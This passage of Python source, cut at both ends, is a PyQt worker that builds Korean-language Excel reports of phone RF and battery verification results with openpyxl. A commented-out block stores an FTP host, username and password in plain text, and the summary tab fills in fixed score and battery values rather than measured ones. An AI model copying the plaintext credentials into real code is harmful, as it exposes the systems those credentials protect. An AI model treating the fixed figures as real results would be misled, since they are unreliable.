end_color='E7E6E6', fill_type='solid')\n self.dark_gray_fill = PatternFill(start_color='D9D9D9', end_color='D9D9D9', fill_type='solid')\n self.light_gray_fill = PatternFill(start_color='F2F2F2', end_color='F2F2F2', fill_type='solid')\n self.apricot_fill = PatternFill(start_color='FDE9D9', end_color='FDE9D9', fill_type='solid')\n self.skyBlue_fill = PatternFill(start_color='DCE6F1', end_color='DCE6F1', fill_type='solid')\n self.yellow_fill = PatternFill(start_color='FFFF00', end_color='FFFF00', fill_type='solid')\n self.orange_fill = PatternFill(start_color='FFC000', end_color='FFC000', fill_type='solid')\n\n # style font color and size\n self.top_font = Font(name='맑은 고딕', size=12, bold=True, color='2B2B2B')\n self.index_font = Font(name='맑은 고딕', size=11, bold=True, color='2B2B2B')\n self.value_font = Font(name='맑은 고딕', size=11, bold=False, color='2B2B2B')\n self.value2_font = Font(name='맑은 고딕', size=10, bold=True, color='2B2B2B')\n self.f2_value_font = Font(name='맑은 고딕', size=10, bold=False, color='2B2B2B')\n self.f2_blue_font = Font(name='맑은 고딕', size=10, bold=False, color='0000FF')\n self.f2_red_font = Font(name='맑은 고딕', size=10, bold=False, color='FF0000')\n\n # style Alignment\n self.general_alignment = Alignment(wrap_text=True, horizontal=\"center\", vertical=\"center\")\n self.top_alignment = Alignment(wrap_text=False, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_2 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"center\")\n self.top_alignment_3 = Alignment(wrap_text=True, horizontal=\"left\", vertical=\"top\")\n\n # style border\n self.thin_border = Border(left=Side(style='thin'), right=Side(style='thin'), top=Side(style='thin'), bottom=Side(style='thin'))\n\n # FTP-related variables and settings\n # self.hostname = '192.168.0.108'\n # self.port = 21\n # self.username = 'voc'\n # self.password = 'testenc@01'\n\n # Periodically emits the count of processed rows\n def getCountRows(self):\n\n while True:\n if self.end_count == \"n\":\n sleep(0.5)\n self.count_flag.emit()\n else:
\n break\n\n # Formats a log message with a timestamp and emits it\n def setPrintText(self, text):\n\n strToday = datetime.today().strftime(\"%Y-%m-%d %H:%M:%S\")\n text = self.find_between(text, \"/s\", \"/e\")\n print_text = strToday+\":\\n\"+text+\"\\n\"\n self.print_flag.emit(\"{}\".format(print_text))\n\n # Stops the worker thread\n def stop(self):\n sleep(0.5)\n self.terminate()\n\n # Removes special characters from text\n def removeString(self, text):\n\n tempText = re.sub('[-=+,#/\\?^$@*\\\"※~&%ㆍ!』\\\\‘|\\(\\)\\[\\]\\<\\>\\{\\}`><\\']', '', text)\n return tempText\n\n # Substring between the first occurrences of two delimiters\n def find_between(self, s, first, last):\n try:\n returnData = \"\"\n start = s.index(first)+len(first)\n end = s.index(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # Substring between the last occurrences of two delimiters\n def find_between_r(self, s, first, last):\n try:\n returnData = \"\"\n start = s.rindex(first)+len(first)\n end = s.rindex(last, start)\n returnData = s[start:end]\n return returnData\n except ValueError:\n return returnData\n\n # Formats a number with two decimal places when possible\n def check_num(self, num):\n\n return_data = None\n if num is None or num == '':\n return_data = '-'\n else:\n try:\n return_data = '%.2f'%float(num)\n except:\n return_data = str(num)\n\n return return_data\n\n # Returns the absolute difference between standard and measured values\n def cal_comparison(self, standard, measure):\n\n return_data = None\n try:\n return_data = self.check_num(abs(round(abs(float(measure)) - float(standard), 2)))\n except:\n return_data = '-'\n\n return return_data\n\n # Checks whether a value can be converted to a number\n def isNumber(self, string_data):\n\n try:\n temp_data = float(string_data)\n return True\n except:\n return False\n\n # Replaces empty or N/A values with '-'\n def check_empty(self, string_data):\n\n return_data = None\n if string_data is None or string_data == '' or string_data.lower() in ['n/a', 'na', 'nt', 'n/t']:\n return_data = '-'\n else:\n return_data = str(string_data)\n\n return return_data\n\n # summary Tab\n def summary_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = {}\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['Summary']\n temp_data['팻네임 / 모델명'] = sheet_in['C5'].value\n temp_data['OS 및 Binary Version'] = sheet_in['C8'].value + \"/\" + sheet_in['C6'].value\n temp_data['Chipset (AP / CP)'] = sheet_in['K6'].value\n temp_data['가로 폭 (mm) / Display Size (inch)'] = sheet_in['K7'].value\n temp_data['배터리 용량 (mAh)'] = str(sheet_in['K8'].value)+'mAh'\n self.battery_spec = float(sheet_in['K8'].value)\n temp_data['검증 차수'] = sheet_in['C9'].value\n temp_data['검증 기간'] = sheet_in['K5'].value\n\n #option setting wb.output\n sheet_out = wb_output['검증결과요약']\n # sheet row 3 handle\n sheet_out.merge_cells('B3:C3')\n sheet_out['B3'] = \"1. 
단말 기본 정보\"\n # sheet row 4 handle\n sheet_out.merge_cells('B4:C4')\n sheet_out.merge_cells('D4:E4')\n sheet_out['B4'] = \"팻네임 / 모델명\"\n sheet_out['D4'] = temp_data['팻네임 / 모델명']\n # sheet row 5 handle\n sheet_out.merge_cells('B5:C5')\n sheet_out.merge_cells('D5:E5')\n sheet_out['B5'] = \"OS 및 Binary Version\"\n sheet_out['D5'] = temp_data['OS 및 Binary Version']\n # sheet row 6 handle\n sheet_out.merge_cells('B6:C6')\n sheet_out.merge_cells('D6:E6')\n sheet_out['B6'] = \"Chipset (AP / CP)\"\n sheet_out['D6'] = temp_data['Chipset (AP / CP)']\n # sheet row 7 handle\n sheet_out.merge_cells('B7:C7')\n sheet_out.merge_cells('D7:E7')\n sheet_out['B7'] = \"가로 폭 (mm) / Display Size (inch)\"\n sheet_out['D7'] = temp_data['가로 폭 (mm) / Display Size (inch)']\n # sheet row 7 handle\n sheet_out.merge_cells('B8:C8')\n sheet_out.merge_cells('D8:E8')\n sheet_out['B8'] = \"배터리 용량 (mAh)\"\n sheet_out['D8'] = temp_data['배터리 용량 (mAh)']\n # sheet row 10 handle\n sheet_out.merge_cells('B10:C10')\n sheet_out['B10'] = \"2. 검증 차수 및 검증 기간\"\n # sheet row 11 handle\n sheet_out.merge_cells('B11:C11')\n sheet_out.merge_cells('D11:E11')\n sheet_out['B11'] = \"검증 차수\"\n sheet_out['D11'] = temp_data['검증 차수']\n # sheet row 12 handle\n sheet_out.merge_cells('B12:C12')\n sheet_out.merge_cells('D12:E12')\n sheet_out['B12'] = \"검증 기간\"\n sheet_out['D12'] = temp_data['검증 기간']\n # sheet row 14 handle\n sheet_out.merge_cells('B14:D14')\n sheet_out['B14'] = '3. 검증 결과 (항목수 : 00, Test Case 수 : 78)'\n # sheet row 15 handle\n sheet_out.merge_cells('B15:C15')\n sheet_out['B15'] = '항목'\n sheet_out['D15'] = 'Pass'\n sheet_out['E15'] = 'Fail'\n # sheet row 16 handle\n sheet_out.merge_cells('B16:B19')\n sheet_out['B16'] = 'RF성능'\n sheet_out['C16'] = 'TRP'\n # sheet row 17 handle\n sheet_out['C17'] = 'TIS'\n # sheet row 18 handle\n sheet_out['C18'] = '속도'\n # sheet row 19 handle\n sheet_out['C19'] = 'Call Setup Test'\n # sheet row 20 handle\n sheet_out.merge_cells('B20:C20')\n sheet_out['B20'] = 'MOS'\n # sheet row 21 handle\n sheet_out.merge_cells('B21:C21')\n sheet_out['B21'] = '배터리소모전류 (시간)'\n # sheet row 22 handle\n sheet_out.merge_cells('B22:C22')\n sheet_out['B22'] = '주파수동조'\n # sheet row 23 handle\n sheet_out.merge_cells('B23:C23')\n sheet_out['B23'] = '발열'\n sheet_out['D23'] = ''\n sheet_out['E23'] = ''\n # sheet row 24 handle\n sheet_out.merge_cells('B24:C24')\n sheet_out['B24'] = '소계'\n sheet_out['D24'] = ''\n sheet_out['E24'] = ''\n # sheet row 25 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out.merge_cells('D25:E25')\n sheet_out['B25'] = '점수 (가/감점)'\n sheet_out['D25'] = '86.9(+12)'\n # sheet row 26 handle\n sheet_out.merge_cells('B26:C26')\n sheet_out.merge_cells('D26:E26')\n sheet_out['B26'] = '배터리소모전류 (DOU, Test case : 35)'\n sheet_out['D26'] = '1.44일'\n\n # sheet row 26 handle\n sheet_out.merge_cells('B28:E28')\n sheet_out.merge_cells('B29:E29')\n sheet_out['B28'] = '4. 
특이사항'\n sheet_out['B29'] = ''\n\n self.setPrintText('/s {}번 파일 \"검증결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n if self.opFlag:\n\n # all cell aligment adjust\n for mCell in sheet_out[\"B3:E26\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n for mCell in sheet_out[\"B29:E29\"]:\n for cell in mCell:\n cell.alignment = self.top_alignment_3\n\n # each coloum width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E']\n sheet_width_list = [3.38, 20, 20, 20, 20]\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[29].height = 85.5\n\n # Set style on Cell\n # row 3\n sheet_out['B3'].font = self.top_font\n sheet_out['B3'].alignment = self.top_alignment\n # row 4\n sheet_out['B4'].font = self.index_font\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['B4'].border = self.thin_border\n sheet_out['D4'].font = self.index_font\n sheet_out['D4'].border = self.thin_border\n sheet_out['C4'].border = self.thin_border\n sheet_out['E4'].border = self.thin_border\n # row 5\n sheet_out['B5'].font = self.index_font\n sheet_out['B5'].fill = self.brown_fill\n sheet_out['B5'].border = self.thin_border\n sheet_out['D5'].font = self.index_font\n sheet_out['D5'].border = self.thin_border\n sheet_out['C5'].border = self.thin_border\n sheet_out['E5'].border = self.thin_border\n # row 6\n sheet_out['B6'].font = self.index_font\n sheet_out['B6'].fill = self.brown_fill\n sheet_out['B6'].border = self.thin_border\n sheet_out['D6'].font = self.index_font\n sheet_out['D6'].border = self.thin_border\n sheet_out['C6'].border = self.thin_border\n sheet_out['E6'].border = self.thin_border\n # row 7\n sheet_out['B7'].font = self.index_font\n sheet_out['B7'].fill = self.brown_fill\n sheet_out['B7'].border = self.thin_border\n sheet_out['D7'].font = self.index_font\n sheet_out['D7'].border = self.thin_border\n sheet_out['C7'].border = self.thin_border\n sheet_out['E7'].border = self.thin_border\n # row 8\n sheet_out['B8'].font = self.index_font\n sheet_out['B8'].fill = self.brown_fill\n sheet_out['B8'].border = self.thin_border\n sheet_out['D8'].font = self.index_font\n sheet_out['D8'].border = self.thin_border\n sheet_out['C8'].border = self.thin_border\n sheet_out['E8'].border = self.thin_border\n # row 10\n sheet_out['B10'].font = self.top_font\n sheet_out['B10'].alignment = self.top_alignment\n # row 11\n sheet_out['B11'].font = self.index_font\n sheet_out['B11'].fill = self.brown_fill\n sheet_out['B11'].border = self.thin_border\n sheet_out['C11'].font = self.index_font\n sheet_out['C11'].border = self.thin_border\n sheet_out['D11'].border = self.thin_border\n sheet_out['D11'].font = self.index_font\n sheet_out['E11'].border = self.thin_border\n\n # row 12\n sheet_out['B12'].font = self.index_font\n sheet_out['B12'].fill = self.brown_fill\n sheet_out['B12'].border = self.thin_border\n sheet_out['C12'].font = self.index_font\n sheet_out['C12'].border = self.thin_border\n sheet_out['D12'].border = self.thin_border\n sheet_out['D12'].font = self.index_font\n sheet_out['E12'].border = self.thin_border\n # row 14\n sheet_out['B14'].font = self.top_font\n sheet_out['B14'].alignment = self.top_alignment\n # row 15\n sheet_out['B15'].font = self.index_font\n sheet_out['B15'].fill = self.brown_fill\n sheet_out['B15'].border = self.thin_border\n sheet_out['D15'].font = self.index_font\n sheet_out['D15'].fill = self.brown_fill\n sheet_out['D15'].border = self.thin_border\n sheet_out['E15'].font = self.index_font\n 
sheet_out['E15'].fill = self.brown_fill\n sheet_out['E15'].border = self.thin_border\n sheet_out['C15'].border = self.thin_border\n # row 16\n sheet_out['B16'].font = self.index_font\n sheet_out['B16'].fill = self.gray_fill\n sheet_out['B16'].border = self.thin_border\n sheet_out['C16'].font = self.index_font\n sheet_out['C16'].fill = self.gray_fill\n sheet_out['C16'].border = self.thin_border\n sheet_out['D16'].font = self.index_font\n sheet_out['D16'].border = self.thin_border\n sheet_out['E16'].font = self.index_font\n sheet_out['E16'].border = self.thin_border\n # row 17\n sheet_out['B17'].border = self.thin_border\n sheet_out['C17'].font = self.index_font\n sheet_out['C17'].fill = self.gray_fill\n sheet_out['C17'].border = self.thin_border\n sheet_out['D17'].font = self.index_font\n sheet_out['D17'].border = self.thin_border\n sheet_out['E17'].font = self.index_font\n sheet_out['E17'].border = self.thin_border\n # row 18\n sheet_out['B18'].border = self.thin_border\n sheet_out['C18'].font = self.index_font\n sheet_out['C18'].fill = self.gray_fill\n sheet_out['C18'].border = self.thin_border\n sheet_out['D18'].font = self.index_font\n sheet_out['D18'].border = self.thin_border\n sheet_out['E18'].font = self.index_font\n sheet_out['E18'].border = self.thin_border\n # row 19\n sheet_out['B19'].border = self.thin_border\n sheet_out['C19'].font = self.index_font\n sheet_out['C19'].fill = self.gray_fill\n sheet_out['C19'].border = self.thin_border\n sheet_out['D19'].font = self.index_font\n sheet_out['D19'].border = self.thin_border\n sheet_out['E19'].font = self.index_font\n sheet_out['E19'].border = self.thin_border\n # row 20\n sheet_out['B20'].font = self.index_font\n sheet_out['B20'].fill = self.gray_fill\n sheet_out['B20'].border = self.thin_border\n sheet_out['D20'].font = self.index_font\n sheet_out['D20'].border = self.thin_border\n sheet_out['E20'].font = self.index_font\n sheet_out['E20'].border = self.thin_border\n sheet_out['C20'].border = self.thin_border\n # row 21\n sheet_out['B21'].font = self.index_font\n sheet_out['B21'].fill = self.gray_fill\n sheet_out['B21'].border = self.thin_border\n sheet_out['D21'].font = self.index_font\n sheet_out['D21'].border = self.thin_border\n sheet_out['E21'].font = self.index_font\n sheet_out['E21'].border = self.thin_border\n sheet_out['C21'].border = self.thin_border\n # row 22\n sheet_out['B22'].font = self.index_font\n sheet_out['B22'].fill = self.gray_fill\n sheet_out['B22'].border = self.thin_border\n sheet_out['D22'].font = self.index_font\n sheet_out['D22'].border = self.thin_border\n sheet_out['E22'].font = self.index_font\n sheet_out['E22'].border = self.thin_border\n sheet_out['C22'].border = self.thin_border\n # row 23\n sheet_out['B23'].font = self.index_font\n sheet_out['B23'].fill = self.gray_fill\n sheet_out['B23'].border = self.thin_border\n sheet_out['D23'].font = self.index_font\n sheet_out['D23'].border = self.thin_border\n sheet_out['E23'].font = self.index_font\n sheet_out['E23'].border = self.thin_border\n sheet_out['C23'].border = self.thin_border\n # row 24\n sheet_out['B24'].font = self.index_font\n sheet_out['B24'].fill = self.light_brown_fill\n sheet_out['B24'].border = self.thin_border\n sheet_out['D24'].font = self.index_font\n sheet_out['D24'].fill = self.light_brown_fill\n sheet_out['D24'].border = self.thin_border\n sheet_out['C24'].border = self.thin_border\n sheet_out['E24'].border = self.thin_border\n sheet_out['E24'].fill = self.light_brown_fill\n # row 25\n sheet_out['B25'].font = self.index_font\n 
sheet_out['B25'].fill = self.light_brown_fill\n sheet_out['B25'].border = self.thin_border\n sheet_out['D25'].font = self.index_font\n sheet_out['D25'].fill = self.light_brown_fill\n sheet_out['D25'].border = self.thin_border\n sheet_out['C25'].border = self.thin_border\n sheet_out['E25'].border = self.thin_border\n # row 26\n sheet_out['B26'].font = self.index_font\n sheet_out['B26'].fill = self.gray_fill\n sheet_out['B26'].border = self.thin_border\n sheet_out['D26'].font = self.index_font\n sheet_out['D26'].fill = self.light_brown_fill\n sheet_out['D26'].border = self.thin_border\n sheet_out['C26'].border = self.thin_border\n sheet_out['E26'].border = self.thin_border\n # row 28\n sheet_out['B28'].font = self.index_font\n # row 29\n sheet_out['B29'].font = self.index_font\n sheet_out['B29'].border = self.thin_border\n sheet_out['C29'].border = self.thin_border\n sheet_out['D29'].border = self.thin_border\n sheet_out['E29'].border = self.thin_border\n\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 \"검증요약결과\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # Test result summary ('시험결과요약') tab\n def test_generate_data(self):\n\n try:\n for idx, item in enumerate(self.list_files):\n\n temp_data = []\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n\n # get data from wb_input\n sheet_in = wb_input['시험결과요약']\n for i in range(6, 28):\n temp_data.append([sheet_in['F'+str(i)].value, sheet_in['G'+str(i)].value, sheet_in['H'+str(i)].value])\n\n #option setting wb.output\n sheet_out = wb_output['시험결과요약']\n # sheet row 2 handle\n sheet_out.merge_cells('B2:H2')\n sheet_out['B2'] = 'H/W 검증결과 요약'\n\n # sheet row 4 and 5 handle\n sheet_out.merge_cells('B4:C5')\n sheet_out['B4'] = \"항목\"\n sheet_out.merge_cells('D4:E5')\n sheet_out['D4'] = 'Test case'\n sheet_out.merge_cells('F4:H4')\n sheet_out['F4'] = '결과'\n sheet_out['F5'] = 'Pass'\n sheet_out['G5'] = 'Fail'\n sheet_out['H5'] = '점수'\n\n # sheet 6 ~ 20 handle\n sheet_out.merge_cells('B6:B20')\n sheet_out['B6'] = sheet_in['B6'].value\n sheet_out.merge_cells('C6:C10')\n sheet_out['C6'] = sheet_in['C6'].value\n sheet_out.merge_cells('C11:C15')\n sheet_out['C11'] = sheet_in['C11'].value\n sheet_out.merge_cells('C16:C19')\n sheet_out['C16'] = sheet_in['C16'].value\n sheet_out['C20'] = sheet_in['C20'].value\n sheet_out.merge_cells('D6:D7')\n sheet_out['D6'] = sheet_in['D6'].value\n sheet_out.merge_cells('D8:D9')\n sheet_out['D8'] = sheet_in['D8'].value\n sheet_out['D10'] = sheet_in['D10'].value\n sheet_out.merge_cells('D11:D12')\n sheet_out['D11'] = sheet_in['D11'].value\n sheet_out.merge_cells('D13:D14')\n sheet_out['D13'] = sheet_in['D13'].value\n sheet_out['D15'] = sheet_in['D15'].value\n sheet_out.merge_cells('D16:D17')\n sheet_out['D16'] = sheet_in['D16'].value\n sheet_out.merge_cells('D18:D19')\n sheet_out['D18'] = sheet_in['D18'].value\n sheet_out['D20'] = sheet_in['D20'].value\n sheet_out['E6'] = sheet_in['E6'].value\n sheet_out['E7'] = sheet_in['E7'].value\n sheet_out['E8'] = sheet_in['E8'].value\n sheet_out['E9'] = sheet_in['E9'].value\n sheet_out['E10'] = sheet_in['E10'].value\n sheet_out['E11'] = sheet_in['E11'].value\n sheet_out['E12'] = sheet_in['E12'].value\n sheet_out['E13'] = sheet_in['E13'].value\n sheet_out['E14'] = sheet_in['E14'].value
\n sheet_out['E15'] = sheet_in['E15'].value\n sheet_out['E16'] = sheet_in['E16'].value\n sheet_out['E17'] = sheet_in['E17'].value\n sheet_out['E18'] = sheet_in['E18'].value\n sheet_out['E19'] = sheet_in['E19'].value\n sheet_out['E20'] = sheet_in['E20'].value\n\n # sheet 21 ~ 24 handle\n sheet_out.merge_cells('B21:C24')\n sheet_out['B21'] = sheet_in['B21'].value\n sheet_out.merge_cells('D21:D22')\n sheet_out['D21'] = sheet_in['D21'].value\n sheet_out.merge_cells('D23:D24')\n sheet_out['D23'] = sheet_in['D23'].value\n sheet_out['E21'] = sheet_in['E21'].value\n sheet_out['E22'] = sheet_in['E22'].value\n sheet_out['E23'] = sheet_in['E23'].value\n sheet_out['E24'] = sheet_in['E24'].value\n\n # sheet 25 ~ 29 handle\n sheet_out.merge_cells('B25:C25')\n sheet_out['B25'] = sheet_in['B25'].value\n sheet_out.merge_cells('D25:E25')\n sheet_out['D25'] = sheet_in['D25'].value\n sheet_out.merge_cells('B26:C26')\n sheet_out['B26'] = sheet_in['B26'].value\n sheet_out.merge_cells('D26:E26')\n sheet_out['D26'] = sheet_in['D26'].value\n sheet_out.merge_cells('B27:C27')\n sheet_out['B27'] = '발열'\n sheet_out.merge_cells('D27:E27')\n sheet_out['D27'] = 'Live Streaming (충전/미충전), 게임(충전/미충전)'\n sheet_out.merge_cells('B28:E28')\n sheet_out['B28'] = sheet_in['B27'].value\n sheet_out.merge_cells('B29:C29')\n sheet_out['B29'] = sheet_in['B28'].value\n sheet_out.merge_cells('D29:E29')\n sheet_out['D29'] = sheet_in['D28'].value\n sheet_out.merge_cells('F29:H29')\n sheet_out['F29'] = sheet_in['F28'].value\n\n self.setPrintText('/s {}번 파일 \"시험결과요약\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n for i in range(6, 27):\n\n sheet_out['F' + str(i)] = temp_data[i-6][0]\n sheet_out['G' + str(i)] = temp_data[i-6][1]\n sheet_out['H' + str(i)] = temp_data[i-6][2]\n\n sheet_out['F28'] = temp_data[21][0]\n sheet_out['G28'] = temp_data[21][1]\n sheet_out['H28'] = temp_data[21][2]\n\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"B4:H29\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['B2'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n sheet_out['B2'].alignment = self.general_alignment\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']\n sheet_width_list = [3.38, 9, 14.25, 8.5, 36.75, 11.25, 11.25, 11.25]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n sheet_out.row_dimensions[2].height = 26.25\n\n # Set Pattern Fill\n sheet_out['B4'].fill = self.brown_fill\n sheet_out['D4'].fill = self.brown_fill\n sheet_out['F4'].fill = self.brown_fill\n sheet_out['F5'].fill = self.brown_fill\n sheet_out['G5'].fill = self.brown_fill\n sheet_out['H5'].fill = self.brown_fill\n\n for i in range(6, 28):\n sheet_out['B' + str(i)].fill = self.gray_fill\n sheet_out['C' + str(i)].fill = self.gray_fill\n sheet_out['D' + str(i)].fill = self.gray_fill\n sheet_out['E' + str(i)].fill = self.gray_fill\n\n sheet_out['B28'].fill = self.dark_gray_fill\n sheet_out['F28'].fill = self.dark_gray_fill\n sheet_out['G28'].fill = self.dark_gray_fill\n sheet_out['H28'].fill = self.dark_gray_fill\n sheet_out['B29'].fill = self.gray_fill\n sheet_out['D29'].fill = self.gray_fill\n self.currentRow = self.currentRow + 1\n self.setPrintText('/s {}번 파일 
\"시험결과요약\" 시트 스타일 적용 완료 /e'.format(idx+1))\n # save file\n wb_output.save(self.list_out_files[idx])\n except:\n self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')\n self.end_count = \"y\"\n self.end_flag.emit()\n\n # TRP Tab\n def trp_generate_data(self):\n # 절대값 abs\n try:\n for idx, item in enumerate(self.list_files):\n\n wb_input = openpyxl.load_workbook(item, data_only=True)\n wb_output = openpyxl.load_workbook(self.list_out_files[idx])\n list_5g_trp = []\n list_lte_trp = []\n list_wcdma_trp = []\n\n # get data from wb_input\n sheet_in = wb_input['5G OTA']\n list_5g_trp.append(self.check_num(sheet_in['J5'].value))\n list_5g_trp.append(self.check_num(sheet_in['J6'].value))\n\n sheet_in = wb_input['LTE OTA']\n list_lte_trp.append(self.check_num(sheet_in['K17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C17'].value))\n list_lte_trp.append(self.check_num(sheet_in['C10'].value))\n list_lte_trp.append(self.check_num(sheet_in['G17'].value))\n list_lte_trp.append(self.check_num(sheet_in['G10'].value))\n list_lte_trp.append(self.check_num(sheet_in['M17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E17'].value))\n list_lte_trp.append(self.check_num(sheet_in['E10'].value))\n list_lte_trp.append(self.check_num(sheet_in['I17'].value))\n list_lte_trp.append(self.check_num(sheet_in['I10'].value))\n\n sheet_in = wb_input['WCDMA OTA']\n list_wcdma_trp.append(self.check_num(sheet_in['D9'].value))\n\n #option setting wb.output\n sheet_out = wb_output['TRP']\n # sheet row 2 handle\n sheet_out.merge_cells('A1:C1')\n sheet_out['A1'] = 'TRP 결과'\n\n # 3~4 row\n sheet_out['A3'] = '▣ SISO TRP'\n sheet_out['A4'] = ' - 5G'\n\n # sheet row 5 and 7 handle\n sheet_out['A5'] = '구분'\n sheet_out['B5'] = '기준(RHP)'\n sheet_out['C5'] = '측정결과'\n sheet_out['D5'] = '비교'\n sheet_out['A6'] = 'CP-OFDM (n78)'\n sheet_out['B6'] = '16.86dBm(V50S)'\n sheet_out['C6'] = list_5g_trp[0]+'dBm'\n # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_5g_trp[0]))-16.86, 2))) + 'dBm'\n sheet_out['D6'] = self.cal_comparison(16.86, list_5g_trp[0]) + 'dBm'\n sheet_out['A7'] = 'DFTs-OFDM (n78)'\n sheet_out['B7'] = '-'\n sheet_out['C7'] = list_5g_trp[1]+'dBm'\n sheet_out['D7'] = '-'\n\n # sheet row 8 and 15 handle\n sheet_out['A8'] = ' - LTE'\n sheet_out['A9'] = '구분'\n sheet_out['B9'] = '기준(RHP)'\n sheet_out['C9'] = '측정결과'\n sheet_out['D9'] = '비교'\n\n sheet_out['A10'] = 'Band 1 15M'\n sheet_out['B10'] = '14.00dBm'\n sheet_out['C10'] = list_lte_trp[0] + 'dBm'\n # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_lte_trp[0]))-14.00, 2))) + 'dBm'\n sheet_out['D10'] = self.cal_comparison(14.00, list_lte_trp[0]) + 'dBm'\n sheet_out['A11'] = 'Band 3 20M'\n sheet_out['B11'] = '15.00dBm'\n sheet_out['C11'] = list_lte_trp[1] + 'dBm'\n # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_lte_trp[1]))-15.00, 2))) + 'dBm'\n sheet_out['D11'] = self.cal_comparison(15.00, list_lte_trp[1]) + 'dBm'\n sheet_out['A12'] = 'Band 5 10M'\n sheet_out['B12'] = '13.50dBm'\n sheet_out['C12'] = list_lte_trp[2] + 'dBm'\n # sheet_out['D12'] = self.check_num(abs(round(abs(float(list_lte_trp[2]))-13.50, 2))) + 'dBm'\n sheet_out['D12'] = self.cal_comparison(13.50, list_lte_trp[2]) + 'dBm'\n sheet_out['A13'] = 'Band 7 20M'\n sheet_out['B13'] = '13.00dBm'\n sheet_out['C13'] = list_lte_trp[3] + 'dBm'\n # sheet_out['D13'] = self.check_num(abs(round(abs(float(list_lte_trp[3])) - 13.00, 2))) + 'dBm'\n sheet_out['D13'] = self.cal_comparison(13.00, list_lte_trp[3]) 
+ 'dBm'\n sheet_out['A14'] = 'Band 7 10M'\n sheet_out['B14'] = '13.00dBm'\n sheet_out['C14'] = list_lte_trp[4] + 'dBm'\n # sheet_out['D14'] = self.check_num(abs(round(abs(float(list_lte_trp[4])) - 13.00, 2))) + 'dBm'\n sheet_out['D14'] = self.cal_comparison(13.00, list_lte_trp[4]) + 'dBm'\n\n # sheet row 15 and 17 handle\n sheet_out['A15'] = ' - WCDMA (납품검사 결과)'\n sheet_out['A16'] = '구분'\n sheet_out['B16'] = '기준(RHP)'\n sheet_out['C16'] = '측정결과'\n sheet_out['A17'] = 'Band 1'\n sheet_out['B17'] = '15.00dBm'\n sheet_out['C17'] = list_wcdma_trp[0] + 'dBm'\n # sheet_out['D17'] = self.check_num(abs(round(abs(float(list_wcdma_trp[0])) - 15.00, 2))) + 'dBm'\n sheet_out['D17'] = self.cal_comparison(15.00, list_wcdma_trp[0]) + 'dBm'\n\n # sheet row 19 and 27 handle\n sheet_out['A19'] = '▣ MIMO TRP'\n sheet_out['A20'] = ' - LTE'\n sheet_out['A21'] = '구분'\n sheet_out['B21'] = '기준(RHP)'\n sheet_out['C21'] = '측정결과'\n sheet_out['A22'] = 'Band 1 15M'\n sheet_out['B22'] = '14.00dBm'\n sheet_out['C22'] = list_lte_trp[5] + 'dBm'\n # sheet_out['D22'] = self.check_num(abs(round(abs(float(list_lte_trp[5])) - 14.00, 2))) + 'dBm'\n sheet_out['D22'] = self.cal_comparison(14.00, list_lte_trp[5]) + 'dBm'\n sheet_out['A23'] = 'Band 3 20M'\n sheet_out['B23'] = '15.00dBm'\n sheet_out['C23'] = list_lte_trp[6] + 'dBm'\n # sheet_out['D23'] = self.check_num(abs(round(abs(float(list_lte_trp[6])) - 15.00, 2))) + 'dBm'\n sheet_out['D23'] = self.cal_comparison(15.00, list_lte_trp[6]) + 'dBm'\n sheet_out['A24'] = 'Band 5 10M'\n sheet_out['B24'] = '13.50dBm'\n sheet_out['C24'] = list_lte_trp[7]+'dBm'\n # sheet_out['D24'] = self.check_num(abs(round(abs(float(list_lte_trp[7])) - 13.50, 2))) + 'dBm'\n sheet_out['D24'] = self.cal_comparison(13.50, list_lte_trp[7]) + 'dBm'\n sheet_out['A25'] = 'Band 7 20M'\n sheet_out['B25'] = '13.00dBm'\n sheet_out['C25'] = list_lte_trp[8] + 'dBm'\n # sheet_out['D25'] = self.check_num(abs(round(abs(float(list_lte_trp[8])) - 13.00, 2))) + 'dBm'\n sheet_out['D25'] = self.cal_comparison(13.00, list_lte_trp[8]) + 'dBm'\n sheet_out['A26'] = 'Band 7 10M'\n sheet_out['B26'] = '13.00dBm'\n sheet_out['C26'] = list_lte_trp[9] + 'dBm'\n # sheet_out['D26'] = self.check_num(abs(round(abs(float(list_lte_trp[9])) - 13.00, 2))) + 'dBm'\n sheet_out['D26'] = self.cal_comparison(13.00, 